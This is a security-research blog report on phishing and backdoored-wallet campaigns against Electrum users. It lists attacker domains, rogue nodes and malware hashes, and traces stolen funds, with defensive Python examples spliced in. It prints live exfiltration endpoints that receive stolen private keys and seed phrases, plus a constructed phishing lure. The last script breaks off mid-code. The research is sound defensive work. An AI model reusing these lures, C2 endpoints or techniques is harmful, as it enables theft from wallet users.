By Jeremiah O'Connor and Peter Kacherginsky

In Electrohunt Part 1, we described the current phishing and malware campaigns targeting the Bitcoin Simplified Payment Verification (SPV) wallet Electrum. In this part we cover the ongoing attack on the Electrum network and its users by these financially motivated criminals. We examine some of the actors and trends we have been seeing lately in the criminal cryptosphere, discuss the detection methodology we are building, and trace some of the transactions on the Electrum network using blockchain analysis to see where the stolen funds are being laundered.

We have observed attacks on the Electrum network originating from the Ukrainian/Russian region, where criminals are notorious for targeting the financial sector (cryptocurrency, banks, credit card fraud) in order to further fund their illicit activities. There have been a variety of delivery vectors in the past; recently, however, attackers have adopted a new method of getting users to connect to malicious servers: launching a DDoS against the network to take legitimate servers down so that clients fail over to malicious ones. Currently several actors are abusing the Electrum network, the largest of them operating out of Ukraine. We assess with high confidence that this financially motivated actor is advanced and has a good amount of knowledge about cryptocurrencies and how the Electrum network operates, which it uses to manipulate the network to its advantage. To date we estimate this actor has stolen over ~7 million dollars worth of BTC since December 2018 (current estimate at time of writing).

Currently we are tracking several financially motivated actors that are abusing various crypto brands via DNS, with the help of DomainTools. Among the most prevalent trends we have observed of late is the rise of phishing combined with malware targeting cryptocurrency SPV wallet software, with Electrum being one of the primary targets. We are observing one particularly large actor (along with a few smaller but effective ones) operating out of the Ukraine/Russia region, targeting the Electrum network, registering domains in bulk, and fluxing between them to evade detection. Below we can see clusters of Electrum phishing sites originating from several Ukrainian netblocks with very little abuse prevention. This rogue infrastructure, sometimes run by the criminals themselves, facilitates the criminal undertakings of these syndicates. Such bulletproof hosts typically rank low among ASNs, with a small number of IPs relative to a high volume of domain abuse. Here we can see one of the largest clusters of phishing sites hosted on ASN 206638, HOSTFORY, UA:

electrumapp.org, 91.211.89[.]115, AS206638 HOSTFORY, UA
goelectrum.com, 91.211.89[.]113, AS206638 HOSTFORY, UA
myelectrum.org, 91.211.89[.]112, AS206638 HOSTFORY, UA
downloadelectrum.org, 91.211.89[.]111, AS206638 HOSTFORY, UA
electrumbtc.org, 91.211.89[.]110, AS206638 HOSTFORY, UA
btcelectrum.org, 91.211.89[.]109, AS206638 HOSTFORY, UA
downloadelectrum.com, 91.211.89[.]108, AS206638 HOSTFORY, UA
electrumdownload.com, 91.211.89[.]107, AS206638 HOSTFORY, UA
electrumupgrade.org, 91.211.89[.]106, AS206638 HOSTFORY, UA
electrumbase.org, 91.211.89[.]103, AS206638 HOSTFORY, UA
electrumsafe.org, 91.211.89[.]103, AS206638 HOSTFORY, UA
electrumware.org, 91.211.89[.]103, AS206638 HOSTFORY, UA
electrumcore.com, 91.211.89[.]103, AS206638 HOSTFORY, UA
electrumopen.org, 91.211.89[.]103, AS206638 HOSTFORY, UA
electrumdownload.org, 91.211.89[.]102, AS206638 HOSTFORY, UA
electrumupdate.com, 91.211.89[.]101, AS206638 HOSTFORY, UA
electrumcircle.com, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumapp.com, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumapps.net, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumbit.org, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumgit.com, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumgroup.net, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumsoft.net, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumversion.com, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrumreleases.org, 91.211.89[.]100, AS206638 HOSTFORY, UA
getelectrum.com, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrum.sx, 91.211.89[.]100, AS206638 HOSTFORY, UA
electrum.bz, 91.211.89[.]100, AS206638 HOSTFORY, UA

These IPs geolocate to Ukraine:

Country: Ukraine
Region: Dnipropetrovska Oblast
City: Dnipro
ISP: PE Brezhnev Daniil

This hosting provider offers dedicated servers for purchase with DDoS protection and very little enforcement over the content hosted on them: a safe haven for criminals to operate openly. Its price list also gives some visibility into the amount of revenue generated by this particular group and what these criminals are willing to spend on dedicated hosting:

This actor is spreading their campaign across other providers as well, here 185.200.190[.]204 on AS42533 DCUA-AS, UA, a Ukrainian provider (domain, IP, country, first seen, ASN):

electrumfix[.]com, 185.200.190[.]204, UA, 2019-02-12T20:05:56, AS42533 DCUA-AS, UA
electrumbase[.]net, 185.200.190[.]204, UA, 2019-02-12T20:06:06, AS42533 DCUA-AS, UA
electrumsite[.]com, 185.200.190[.]204, UA, 2019-02-12T20:03:03, AS42533 DCUA-AS, UA
electrumbuild[.]com, 185.200.190[.]204, UA, 2019-02-12T04:27:08, AS42533 DCUA-AS, UA
electrumcore[.]net, 185.200.190[.]204, UA, 2019-02-09T17:01:22, AS42533 DCUA-AS, UA
electrumapps[.]com, 185.200.190[.]204, UA, 2019-02-07T17:39:44, AS42533 DCUA-AS, UA
electrumbase[.]com, 185.200.190[.]204, UA, 2019-02-07T17:39:54, AS42533 DCUA-AS, UA
electrumweb[.]net, 185.200.190[.]204, UA, 2017-11-30T02:49:16Z, AS42533 DCUA-AS, UA
electrumsource[.]org, 185.200.190[.]204, UA, 2017-11-30T02:49:16Z, AS42533 DCUA-AS, UA

IP location

Country: Ukraine
Region: Kyiv
City: Kiev
ISP: Ntx Technologies Ltd

ASN

AS51765 CREANOVA-AS Oy Creanova Hosting Solutions Ltd., FI (registered)

Here is a cluster of Electrum phishing sites originating from the Russian AS29182, THEFIRST-AS, RU, which also uses IDNs (internationalized domain names, encoded as xn-- punycode labels) to make the spoofs look more legitimate:

eilectrum.org, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
eliectrum.org, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
ellectrium.org, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
elliectrum.org, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
get-electrum.net, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
get-electrum.pro, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
xn--eectrum-9hb.org, 82.146.37[.]8, AS29182 THEFIRST-AS, RU
xn--eletrum-45a.com, 82.146.37[.]8, AS29182 THEFIRST-AS, RU

Using DNS visibility tools such as DomainTools we are able to monitor and analyze attacker infrastructure. Here we can see the attackers copy content directly from Electrum's page source, using a Let's Encrypt TLS certificate to make their spoofed sites appear more legitimate:

One of the key components of any successful phishing campaign is the delivery vector: how the fraudulent content is served to the target. Criminal actors targeting cryptocurrencies have used a variety of delivery mechanisms including email, mass malvertising, spoofed in-application error messages and, most recently, DDoSing legitimate servers on the Electrum network in an effort to push unsuspecting users onto malicious servers. The delivery mechanism in this campaign is rather unique: a user running legitimate Electrum software connects to an Electrum server run by the attacker, and when they try to broadcast a transaction the server replies with an error message that redirects the unwitting user to the phishing site, which advertises the malicious version for download. To increase the attack's probability of success, the attackers are not only registering new domains on different infrastructure (within the same region) in widespread fashion and fluxing between them; they are also spinning up many new servers (sybils) to increase the chance that a legitimate client connects to a rogue server.
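What the rogue node actually does on the wire is simple, and so is the client-side check that defeats it. The exchange below is an added example, not Electrum's code: the request mirrors the shape of an Electrum-protocol broadcast (newline-delimited JSON-RPC with id/method/params, as the writer of this example understands the protocol), the rogue reply is a constructed lure in the style described above rather than a captured sample, and vet_server_error is the kind of filter a client should apply before rendering any server-supplied string: an error that carries markup, a URL or upgrade language is hidden from the user and the server is treated as untrusted.

```python
import json
import re

# Constructed: what an unmodified client sends when the user presses "Send".
# The raw transaction hex is a placeholder, not a real transaction.
BROADCAST_REQUEST = {
    "id": 7,
    "method": "blockchain.transaction.broadcast",
    "params": ["0100000001deadbeef..."],
}


def honest_reply(request):
    """A legitimate node answers a broadcast with the txid (placeholder here)."""
    return {"id": request["id"], "result": "f" * 64}


def rogue_reply(request):
    """A rogue node answers with an error whose text is the phishing lure.
    Constructed to match the behaviour described above; not a captured sample."""
    return {
        "id": request["id"],
        "error": (
            "Your version of Electrum is out of date and will not work. "
            'Please upgrade at <a href="https://electrumsafe[.]org">electrumsafe[.]org</a>'
        ),
    }


URL_RE = re.compile(r"(?:https?://|www\.)[^\s\"'<>]+", re.I)
TAG_RE = re.compile(r"<[^>]+>")
LURE_RE = re.compile(r"\b(?:upgrade|update|download|new version|out of date)\b", re.I)


def vet_server_error(reply):
    """Decide whether a server-supplied error is safe to show to the user.

    Returns (safe, text_to_display, reasons). Servers are untrusted input: a
    client must never render their strings as rich text, and a string that
    tries to send the user somewhere is itself an indicator of a rogue node."""
    err = reply.get("error")
    if err is None:
        return True, None, []
    # Newer servers send {"code": .., "message": ..}; older ones sent bare strings.
    text = err.get("message", json.dumps(err)) if isinstance(err, dict) else str(err)
    reasons = []
    if TAG_RE.search(text):
        reasons.append("markup")
    if URL_RE.search(text):
        reasons.append("url")
    if LURE_RE.search(text):
        reasons.append("upgrade-lure")
    if reasons:
        return False, "Server returned a suspicious error and has been marked untrusted.", reasons
    return True, TAG_RE.sub("", text), []


def broadcast(request, server):
    """Run one request/response cycle through the check. Returns (status, detail)."""
    line = json.dumps(request) + "\n"            # wire framing: one JSON object per line
    reply = server(json.loads(line))
    if "result" in reply:
        return "broadcast", reply["result"]
    safe, display, reasons = vet_server_error(reply)
    return ("server-error", display) if safe else ("rogue-server", reasons)


if __name__ == "__main__":
    print(broadcast(BROADCAST_REQUEST, honest_reply))
    print(broadcast(BROADCAST_REQUEST, rogue_reply))
```

The point of the check is that the error channel is the only thing the attacker controls; once the client refuses to display anything in it that looks like a call to action, the sybil nodes and the DDoS still cost the attacker money but no longer deliver a victim to the phishing page.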

Electrum has been a target of nation-state actors as well as organized crime groups in the past. We have seen Electrum widely abused before via different delivery mechanisms by attackers in the same Ukraine/Russia region. Electrum was a major target in mass malvertising campaigns in Google Ads:

Google Ads targeting cryptocurrency wallets and exchanges have been subject to heavy takedown since late 2017 / early 2018, which we have assisted with, and the overall health of cryptocurrency-related ads is much cleaner. Recently attackers have resorted to DDoSing the Electrum network with a massive botnet of over 80K IPs (numbers at time of writing). They aim it at the legitimate servers in an effort to overload them and force clients onto the malicious nodes, which then advertise an "upgrade to the latest version" and redirect users to the phishing sites where they download the wallet malware.

We are in the early stages of building out our statistical attack detection capabilities and experimenting with a collection of different algorithms for discovering these fraudulent sites within network traffic. For our training set we built a knowledge base of cryptocurrency wallet/exchange sites and data associated with them. Extracting signals from labeled network traffic and using Doc2Vec to build a model on features from the legitimate crypto brand sites' DOM, we are currently leveraging a mix of unsupervised and supervised techniques to look for suspicious behavior in network traffic. Testing the model live against some of the actor networks we are tracking, we are getting excellent preliminary results and finding many of these domains alive and serving weaponized content at the same time, which shows the actors rotating between the various domains they have registered. Here are some results from probing the network on February 18:
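The core of the detector described above is a similarity judgement: a page whose DOM is almost identical to a known brand's page, served from a domain the brand does not own, is a clone. The script below is an added example and a deliberate simplification of the authors' Doc2Vec approach, not their code: it represents a page as a bag of tag bigrams (tag names plus class attributes, which cloners copy verbatim from the brand's page source), scores pages against a reference page by cosine similarity, and calls anything above a threshold on a non-brand domain a phish. The three HTML snippets, the brand's domain set and the 0.85 threshold are constructed for the example.

```python
import math
from collections import Counter
from html.parser import HTMLParser

# Constructed reference page standing in for the brand's real site.
LEGIT_HTML = """<html><head><title>Electrum Bitcoin Wallet</title>
<link rel="stylesheet" href="/style.css"></head>
<body class="home"><nav class="top"><a href="/">Home</a><a href="/download">Download</a></nav>
<div class="hero"><h1>Electrum Bitcoin Wallet</h1><p>Lightweight Bitcoin client</p>
<a class="btn download" href="https://download.electrum.org/">Download Electrum</a></div>
</body></html>"""

# Constructed clone: same markup, download link repointed, one tracking script appended.
CLONE_HTML = LEGIT_HTML.replace(
    "https://download.electrum.org/", "https://electrumsafe[.]org/dl/"
).replace("</body>", '<script src="/s.js"></script></body>')

# Constructed unrelated page (control).
OTHER_HTML = """<html><head><title>Weather</title></head>
<body><table><tr><td>Mon</td><td>Sunny</td></tr></table></body></html>"""

BRAND = {"name": "Electrum",
         "domains": {"electrum.org", "download.electrum.org"},   # assumption for the example
         "reference_html": LEGIT_HTML}


class TagSequence(HTMLParser):
    """Collect start tags in document order, keeping class names as part of the token."""

    def __init__(self):
        super().__init__()
        self.tokens = []

    def handle_starttag(self, tag, attrs):
        classes = dict(attrs).get("class")
        token = tag + ("." + ".".join(classes.split()) if classes else "")
        self.tokens.append(token)


def dom_vector(html, n=2):
    """Bag of tag n-grams: structure-only features, unaffected by text or link edits."""
    parser = TagSequence()
    parser.feed(html)
    seq = parser.tokens
    return Counter(tuple(seq[i:i + n]) for i in range(len(seq) - n + 1))


def cosine(a, b):
    dot = sum(a[k] * b[k] for k in a.keys() & b.keys())
    norm_a = math.sqrt(sum(v * v for v in a.values()))
    norm_b = math.sqrt(sum(v * v for v in b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


def classify_page(domain, html, brand=BRAND, threshold=0.85):
    """Return (verdict, brand_name, similarity). 'phish' = looks like the brand, is not the brand."""
    sim = round(cosine(dom_vector(html), dom_vector(brand["reference_html"])), 3)
    if sim < threshold:
        return "unrelated", None, sim
    verdict = "legit" if domain in brand["domains"] else "phish"
    return verdict, brand["name"], sim


if __name__ == "__main__":
    for domain, page in [("electrum.org", LEGIT_HTML),
                         ("electrumsafe.org", CLONE_HTML),
                         ("example.com", OTHER_HTML)]:
        print(domain, classify_page(domain, page))
```

The clone scores about 0.96 against the reference even though every link on it has been changed, because the attacker kept the brand's markup and CSS hooks intact; a real deployment would replace the bag-of-bigrams vector with the Doc2Vec embedding the article describes, but the decision rule (high similarity plus unknown domain) is the same.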

--------------------------------
Domain: electrumbase.org
Timestamp: 2019-02-18 21:07:51.625177
Prediction → Phish, Class → Electrum
--------------------------------
Domain: electrumsafe.org
Timestamp: 2019-02-18 21:07:57.839763
Prediction → Phish, Class → Electrum
--------------------------------
Domain: electrumware.org
Timestamp: 2019-02-18 21:08:05.534325
Index, Cos Sim (0-1), Document (Brand/Domain)
Prediction → Phish, Class → Electrum
--------------------------------
Domain: electrumcore.com
Timestamp: 2019-02-18 21:08:12.128769
Prediction → Phish, Class → Electrum
--------------------------------
Domain: electrumopen.org
Timestamp: 2019-02-18 21:08:18.911233
Prediction → Phish, Class → Electrum
--------------------------------
HTTPConnectionPool(host='electrumget.com', port=80): Max retries exceeded with url: / (Caused by ConnectTimeoutError(…, 'Connection to electrumget.com timed out. (connect timeout=10)'))
--------------------------------
Domain: electrumdownload.com
Timestamp: 2019-02-18 21:08:35.910781
Prediction → Phish, Class → Electrum
--------------------------------
Domain: electrumdownload.org
Timestamp: 2019-02-18 21:08:42.666782
Prediction → Phish, Class → Electrum
--------------------------------
Domain: goelectrum.com
Timestamp: 2019-02-18 21:08:48.912725
Prediction → Phish, Class → Electrum
--------------------------------
Domain: etelectrum.com
Timestamp: 2019-02-18 21:08:56.183600
Prediction → Phish, Class → Electrum
--------------------------------
HTTPConnectionPool(host='electrumupgrade.org', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('…: Failed to establish a new connection: [Errno 8] nodename nor servname provided, or not known',))
--------------------------------
Domain: electrumupdate.com
Timestamp: 2019-02-18 21:09:02.765260
Prediction → Phish, Class → Electrum
--------------------------------
HTTPConnectionPool(host='electrumpgrade.com', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('…: Failed to establish a new connection: [Errno 61] Connection refused',))
--------------------------------
Domain: electrumdownload.com
Timestamp: 2019-02-18 21:09:09.291047
Prediction → Phish, Class → Electrum
--------------------------------
HTTPConnectionPool(host='electrumbtc.org', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('…: Failed to establish a new connection: [Errno 51] Network is unreachable',))
--------------------------------
Domain: downloadelectrum.org
Timestamp: 2019-02-18 21:09:22.838411
Prediction → Phish, Class → Electrum
--------------------------------
Domain: downloadelectrum.com
Timestamp: 2019-02-18 21:09:29.267028
Prediction → Phish, Class → Electrum
--------------------------------
Domain: btcelectrum.org
Timestamp: 2019-02-18 21:09:35.728569
Prediction → Phish, Class → Electrum
--------------------------------
Domain: electrumware.org
Timestamp: 2019-02-18 21:09:42.282752
Prediction → Phish, Class → Electrum
--------------------------------

Fluxing networks of phishing sites is a common adversarial technique used by attackers to evade detection and tracking: as soon as one malicious domain is found and reported, a new domain is spun up and ready to steal, sometimes on different (but still bulletproof) infrastructure in order to make correlation harder.

Using blockchain analysis tools we were able to trace the money flow of this attacker group. Below we can see that a majority of the transactions (373 txns at time of writing) went to BitSquare:

At BitSquare the stolen funds (BTC) were then converted to a more privacy-oriented technology, Monero (XMR):

When engaging in criminal activity, it helps not to have your transactions stored on a public ledger for law enforcement and cyber security professionals to analyze. Privacy coins such as Monero, while on their own simply privacy technology and non-malicious, can serve as an additional layer of anonymization for criminals to further mask the movement of stolen funds, a trend that is now very common among actors knowledgeable about cryptocurrencies. Analyzing the transaction graph a bit deeper we were able to determine some heuristics characteristic of this actor group, and were able to discover over 150 addresses associated with these attacks. Among the common patterns associated with this group:

  1. Interaction with addresses found in the malware executables and through open source intelligence gathering
  2. Use of one-time, disposable sub-wallets for further obfuscation of the stolen BTC
  3. Sending to other bech32 (segwit) addresses with a split of ~2.0 BTC, which we suspect to be some form of payment to another entity (see screenshot below with transactions on 4/16)
  4. Similarity among the entities the funds were sent to, such as BitSquare, Bitfinex, and other exchanges with limited KYC enforcement, abused by criminals en masse: for lack of a better term, "bulletproof exchanges"
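Heuristics 1 through 3 above can be turned into a small graph walk. The Python below is an added example, not the authors' tooling or any Elliptic product: it starts from seed addresses (the kind recovered hard-coded from the malware), applies the common-input-ownership heuristic, follows funds through one-time pass-through addresses into the actor's cluster, records everything else the actor pays as a destination, and flags ~2.0 BTC outputs to bech32 addresses. The transaction set is constructed for the example; the address strings, amounts and 0.05 BTC tolerance are made up.

```python
from collections import defaultdict

# Constructed transaction graph. Each tx: inputs (addresses spent) and outputs (address, BTC).
# Addresses are placeholders, not real ones.
TXS = [
    {"txid": "t1", "inputs": ["1victimA"],   "outputs": [("bc1qseed", 0.80)]},
    {"txid": "t2", "inputs": ["1victimB"],   "outputs": [("bc1qseed", 1.70)]},
    {"txid": "t3", "inputs": ["bc1qseed"],   "outputs": [("bc1qhop1", 2.49)]},   # sweep to a throwaway
    {"txid": "t4", "inputs": ["bc1qhop1"],   "outputs": [("bc1qpay1", 2.00), ("bc1qhop2", 0.48)]},
    {"txid": "t5", "inputs": ["bc1qhop2"],   "outputs": [("3exchangeDeposit", 0.47)]},
    {"txid": "t6", "inputs": ["1unrelated"], "outputs": [("1shop", 0.30)]},
]

SEED_ADDRESSES = {"bc1qseed"}   # e.g. the redirect address recovered from the malware


def one_time_addresses(txs):
    """Heuristic 2: addresses funded exactly once and spent exactly once (pass-through hops)."""
    received, spent = defaultdict(int), defaultdict(int)
    for tx in txs:
        for addr, _ in tx["outputs"]:
            received[addr] += 1
        for addr in tx["inputs"]:
            spent[addr] += 1
    return {a for a in received if received[a] == 1 and spent[a] == 1}


def split_payments(txs, actor, target=2.0, tolerance=0.05, prefix="bc1"):
    """Heuristic 3: ~target BTC outputs from actor-controlled inputs to bech32 addresses."""
    hits = []
    for tx in txs:
        if not set(tx["inputs"]) & actor:
            continue
        for addr, amount in tx["outputs"]:
            if addr.startswith(prefix) and abs(amount - target) <= tolerance:
                hits.append((tx["txid"], addr, amount))
    return hits


def expand_cluster(txs, seeds):
    """Heuristics 1 + 2: grow the actor's address set from known seeds.

    Every input co-spent with an actor address is assumed actor-owned (common-input
    ownership); one-time addresses the actor pays are treated as its own hops and
    followed; everything else the actor pays is recorded as a destination."""
    hops = one_time_addresses(txs)
    actor, destinations = set(seeds), set()
    frontier = list(seeds)
    while frontier:
        addr = frontier.pop()
        for tx in txs:
            if addr not in tx["inputs"]:
                continue
            for co_input in tx["inputs"]:
                if co_input not in actor:
                    actor.add(co_input)
                    frontier.append(co_input)
            for out_addr, _ in tx["outputs"]:
                if out_addr in actor:
                    continue
                if out_addr in hops:
                    actor.add(out_addr)
                    frontier.append(out_addr)
                else:
                    destinations.add(out_addr)
    return actor, destinations


if __name__ == "__main__":
    actor, dests = expand_cluster(TXS, SEED_ADDRESSES)
    print("actor-controlled:", sorted(actor))
    print("destinations:    ", sorted(dests))
    print("~2 BTC splits:   ", split_payments(TXS, actor))
```

Note the asymmetry the walk relies on: victims' addresses are never pulled into the cluster because the walk only follows transactions the actor spends from, while change sent to a fresh one-time address is treated as the actor's own money and followed until it reaches an address that behaves like a deposit point.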

Tracking the stolen funds that went through Bitfinex, we observed they were sent to MorphToken, a token marketplace dedicated to swapping assets, similar to ShapeShift.io. Additionally we can see interaction with LocalBitcoins, aka "the Craigslist of bitcoins", a peer-to-peer exchange that offers an easier/safer way for financially motivated actors to cash out. We can also see interactions with Russian darknet markets including Hydra and Wall Street Market:

We are observing an increasing trend in this type of coin-stealing malware targeting a variety of brands and we expect it will continue to become more common. Users aware of the nefarious activity on the Electrum network are looking to the next Bitcoin wallet, which is also being targeted by crypto-motivated attackers. Attackers are beginning to phish other Bitcoin wallet brands including Exodus and Bitcoin Armory. These originate from the same Ukraine/Russia region, and we have observed a variety of phishing attacks on cryptocurrency brands originating from the netblock AS48282 MCHOST-AS, RU; this particular IP is 185.[…].39[.]110:

Here we can see the domain bitcoinarmory[.]tech on the same IP targeting another offline wallet, Bitcoin Armory:

Other attack trends to note in this area are the attacks on Trezor wallets described in the recent PhishFort article; these attacks were hosted on 91.220.101[.]25, 91.220.101[.]37 and 91.220.101[.]53, on AS34259, HIGHLOAD Systems. We are observing a continuing trend of financially motivated attackers in the Ukraine/Russia region targeting all types of cryptocurrency wallets, not limited to software but also including hardware wallets.

While mapping this Electrum campaign our detection methods converged on several different levels. We were able to track these campaigns at the DNS level, the malware executable level, through open-source intelligence, and through blockchain analysis; by cataloging heuristics specific to this actor group we are able to trace new wallets as they are created. Intelligence gained from analyzing this particular actor group's activity also helped us tune our own detection models and software tools to increase traceability and further protect the crypto economy. Make sure to stay vigilant when downloading the latest versions of cryptocurrency wallet software. Some of the security measures users can take to avoid getting phished/infected with wallet malware:

  • Check the URL of the site you are downloading from or entering credentials into
  • Bookmark the URLs of the wallets/exchanges you transact with
  • If downloading from an outside source, make sure it is trusted, and that the executable's hash (and the developer's signature, where the project publishes one) matches the legitimate release

Special thanks for contributions to this article and for intelligence to DomainTools, Elliptic, PhishFort, MyCrypto, and the other security professionals at wallet companies/exchanges in the crypto community whom we will keep anonymous; you know who you are.


Campaign #1

This campaign relies on serving malicious error messages to older Electrum clients and instructing them to download backdoored versions of the client. Based on the malware analysis, this is the same actor as Campaign #1 described in the previous part of the report.

Domains for this campaign:

https://electrum[.]bz
https://electrumproject[.]org
https://electrumsecure[.]org
https://electrum[.]la


The malware is a backdoored build of Electrum 3.3.3, distributed under the version number 4.0.0. Below are the MD5 hashes:

8324ecf39c1f297d781e735ece4abb81  Electrum-4.0.0.0-release.apk
3ff2d49aee1198454f33efea26f08c0a  electrum-4.0.0.dmg
e0cef18af25e66fc7c5734ea89be62ef  electrum-4.0.0.exe
788055c6b769a1e515a60f9e851f5b46  electrum-4.0.0-portable.exe
6a48a4b0aecf5eaf9a4d8139a152be59  electrum-4.0.0-setup.exe
4e77091af3c083f97b54355e0d36f92e  Electrum-4.0.0.tar.gz

Redirects transactions to the following address:

bc1qcla39fm0q8ka8th8ttpq0yxla30r430m4hgu3x

Changes made:

  • Disabled various application warnings
  • Disabled the update mechanism
  • Caches the application password

The malware has also modified the default node list, removing the majority of nodes and leaving only the following intact:

bitcoin3nqy3db7c[.]onion
electrumxhqdsmlu[.]onion

It has also added the following new nodes:

luggscoqbymhvnkp[.]onion
ndndword5lpb7eex[.]onion
ozahtqwp25chjdjd[.]onion
qtornadoklbgdyww[.]onion
s7clinmo4cazmhul[.]onion
wsw6tua3xl24gsmi264zaep6seppjyrkyucpsmuxnjzyt3f3j6swshad[.]onion
oneweek.duckdns[.]org
electrum.electrumxm[.]com
electrum.elastics[.]info
electrum.esrv[.]one
electrum.ssrv[.]info
electrum.fullhealth[.]net
electrum.tnsfr[.]link
electrum.livex[.]biz
electrum.rollerco[.]xyz
electrum.arcade[.]tel
electrum.bip[.]click
electrum.xs500[.]net
electrum.lightspeed[.]tel
electrum.txid[.]pw
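The node-list tampering above is cheap to check for on a suspect installation. The Python below is an added example, not part of Electrum or of the authors' tooling: it compares the servers.json found in an install against a trusted copy of the same file and scores the additions. The reference list is a constructed stand-in (placeholder hostnames plus the two .onion entries the page says were left intact), the tampered list mirrors some of the hosts listed above, and the dynamic-DNS provider list, the cheap-TLD list and the 50% threshold are assumptions made for the example.

```python
import json

# Constructed trusted copy: placeholder hostnames stand in for the real bundled list,
# plus the two onion entries the page says the malware left in place. The "s"/"t"
# fields mirror the SSL/TCP port keys used in Electrum's servers.json.
REFERENCE_JSON = json.dumps({
    "good-node-1.example":    {"s": "50002", "t": "50001"},
    "good-node-2.example":    {"s": "50002", "t": "50001"},
    "good-node-3.example":    {"s": "50002", "t": "50001"},
    "good-node-4.example":    {"s": "50002", "t": "50001"},
    "bitcoin3nqy3db7c.onion": {"s": "50002", "t": "50001"},
    "electrumxhqdsmlu.onion": {"s": "50002", "t": "50001"},
})

# Constructed tampered copy built from hosts listed above.
INSTALLED_JSON = json.dumps({
    "bitcoin3nqy3db7c.onion": {"s": "50002", "t": "50001"},
    "electrumxhqdsmlu.onion": {"s": "50002", "t": "50001"},
    "luggscoqbymhvnkp.onion": {"s": "50002", "t": "50001"},
    "oneweek.duckdns.org":    {"s": "50002", "t": "50001"},
    "electrum.txid.pw":       {"s": "50002", "t": "50001"},
    "electrum.arcade.tel":    {"s": "50002", "t": "50001"},
})

# Assumptions: common free dynamic-DNS providers and TLDs that cost next to nothing.
DYNAMIC_DNS = ("duckdns.org", "hopto.org", "no-ip.org", "ddns.net")
CHEAP_TLDS = (".pw", ".tel", ".xyz", ".click", ".biz", ".link", ".info", ".one")


def flag_host(host, reference):
    """Reasons a newly added server entry deserves suspicion."""
    reasons = []
    if host.endswith(DYNAMIC_DNS):
        reasons.append("dynamic-dns")
    if host.endswith(".onion") and host not in reference:
        reasons.append("unknown-onion")
    if host.endswith(CHEAP_TLDS):
        reasons.append("cheap-tld")
    if host.startswith("electrum.") and host not in reference:
        reasons.append("brand-prefix")   # "electrum." label hung off an unrelated domain
    return reasons


def audit_server_list(installed_json, reference_json, min_kept_fraction=0.5):
    """Diff an installed servers.json against a trusted copy and return a verdict."""
    installed = json.loads(installed_json)
    reference = json.loads(reference_json)
    kept = sorted(set(installed) & set(reference))
    removed = sorted(set(reference) - set(installed))
    added = {h: flag_host(h, reference) for h in sorted(set(installed) - set(reference))}
    kept_fraction = len(kept) / len(reference) if reference else 0.0
    if added and kept_fraction < min_kept_fraction:
        verdict = "tampered"   # most trusted peers gone and strangers added: the client is captive
    elif added or removed:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "kept": kept, "removed": removed, "added": added,
            "kept_fraction": round(kept_fraction, 2)}


if __name__ == "__main__":
    print(json.dumps(audit_server_list(INSTALLED_JSON, REFERENCE_JSON), indent=2))
```

The combination matters more than any single flag: a legitimate update may add or drop a few servers, but a list that has lost most of its bundled peers while gaining hosts on dynamic DNS and throwaway TLDs means the client can only ever talk to nodes the attacker controls.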

Campaign #2

The backdoored version of the Electrum wallet attempts to upload the base64-encoded private key to the following server:

http://38.128.66[.]3:4285/post/data=[KEY_BASE64]

Campaign domains:

https://www.electrumsecuredownload[.]com

Malware samples (MD5):

313562c72732ac7a9ad43571ac7e5856  electrum-3.4.0.exe
e35a2e2c5180c6b63e534cb1c4671552  electrum-3.4.0-portable.exe
068d4ebe8901f00b7df9e885198bbc32  electrum-3.4.0-setup.exe
d9a7365787febee99a1d95ee9aeaad8b  electrum-3.4.0-x86_64.AppImage

Campaign #3

Propagates by sending fake error messages from malicious servers. Targets a BCH fork of Electrum called Electron Cash. Unique in its use of sharefile.com for distribution.

Standalone executable: https://Electrum.sharefile.com/d-s133ec465886459b8
Windows installer: https://Electrum.sharefile.com/d-sd63f248b96c410d9
Mobile version: https://Electrum.sharefile.com/d-s8e5840fd61d46dfa
macOS: https://Electrum.sharefile.com/d-s356f875975c47079

Hashes (MD5) for the above:

5768cf5db5ca9fd8c97a42779b1c3601  Electron-Cash-3.3.6.dmg
fee2190475e8d1742a65c5c8a49cc517  Electron-Cash-3.3.6.exe
3b149a9d7ad6f4032f386d2f08968f08  Electron-Cash-3.3.6-portable.exe
0f2b668e71a086ab662ddc25a7486135  Electron-Cash-3.3.6-setup.exe

Campaign #4

A distinct actor that uses malicious nodes to trigger phishing error messages in older Electrum clients. The actor appears to be fairly new and uses several unique techniques, listed below.

Phishing site:

http://electrumwalletbtc.hopto[.]org

Malware samples (MD5):

21655fdacbfac2b187f0a5f98f39888e  electrum-3.3.4-portable.exe
80f570f3026f4a09d5eff3c29858fa63  electrum-3.3.4-setup.exe
77f846b48ad7a625f585c1f126dc2252  electrum-3.3.4-x86_64.tar.xz

The malware is unique in building from the latest source in the official GitHub repository, commit 441da52b (HEAD) specifically. It makes the following modifications to the source files:

  • Disables the update UI options
  • Captures the user's seed and forwards it to the C2 URL as HTTP POST parameters {'s': seed, 'se': seedext}

C2 URL:

http://electrumwalletbtc.hopto[.]org/time.php
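Campaigns #2 and #4 both leak the wallet secret over plain HTTP, one as a base64 blob in the request path and one as POST parameters, which makes them detectable at a proxy or egress sensor. The Python below is an added example, not the authors' detection code: it scans JSON-lines proxy records for secrets in wallet-specific shapes (a WIF private key, an extended private key, a 12-24 word seed phrase), also decoding base64 tokens before matching so the Campaign #2 encoding does not hide the key. The log records are constructed, the "key" is a 51-character string in WIF shape rather than a live key, the seed words are a widely published example phrase, and the record field names are an assumption about the proxy's log format.

```python
import base64
import binascii
import json
import re
from urllib.parse import unquote_plus

B58 = r"[1-9A-HJ-NP-Za-km-z]"
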